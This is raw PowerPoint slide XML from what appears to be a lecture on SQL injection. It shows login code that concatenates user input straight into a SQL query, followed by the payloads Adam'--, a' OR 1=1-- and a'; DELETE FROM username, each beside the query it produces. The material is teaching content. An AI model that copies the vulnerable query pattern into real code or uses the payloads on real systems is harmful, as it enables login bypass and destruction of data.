                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strPwd</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"password"</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3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"SELECT * FROM users</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5                     WHERE username = '" </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6                     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AND password = '" </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strPwd</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7</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>8  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecuteQuery</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db_connection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> );</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147295" y="3861048"/>
            <a:ext cx="7924800" cy="2522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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Adam'--</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Adam'--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' AND password = ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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147295" y="1082457"/>
            <a:ext cx="8153400" cy="2667000"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"user"</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2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strPwd</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"password"</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3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"SELECT * FROM users</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5                     WHERE username = '" </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6                     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AND password = '" </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strPwd</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7</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>8  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecuteQuery</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db_connection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> );</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147295" y="3861048"/>
            <a:ext cx="7924800" cy="2522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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a' OR 1=1--</a:t>
            </a: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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM items WHERE username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'a' OR 1=1-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-' AND password = ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1116566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147295" y="1082457"/>
            <a:ext cx="8153400" cy="2667000"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"user"</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2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strPwd</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"password"</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3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"SELECT * FROM users</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5                     WHERE username = '" </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6                     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AND password = '" </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strPwd</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7</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>8  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ExecuteQuery</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db_connection</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> );</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="8" name="Straight Connector 8"/>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Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="147295" y="3861048"/>
            <a:ext cx="7924800" cy="2522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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a'; DELETE FROM username; SELECT * FROM items WHERE 'a'='a</a:t>
            </a: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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM username WHERE user = 'a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> DELETE FROM username;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> SELECT * FROM username WHERE 'a'='a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0810B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' AND password = ''</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Georgia" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2356256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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="147295" y="1082457"/>
            <a:ext cx="8153400" cy="2667000"/>
            <a:chOff x="685800" y="609600"/>
            <a:chExt cx="8153400" cy="1905000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="685800" y="609600"/>
              <a:ext cx="8153400" cy="1905000"/>
            </a:xfrm>
            <a:prstGeom prst="round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indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  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"user"</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2  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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strPwd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>request.getParameter</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"password"</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3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent2">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  string</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"SELECT * FROM users</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>5                     WHERE username = '" </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strUser</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6                     </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>AND password = '" </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strPwd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> + </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="0810B8"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"'"</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" indent="0" algn="l">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>7</a:t>
              </a:r>
            </a:p>
            <a:p>
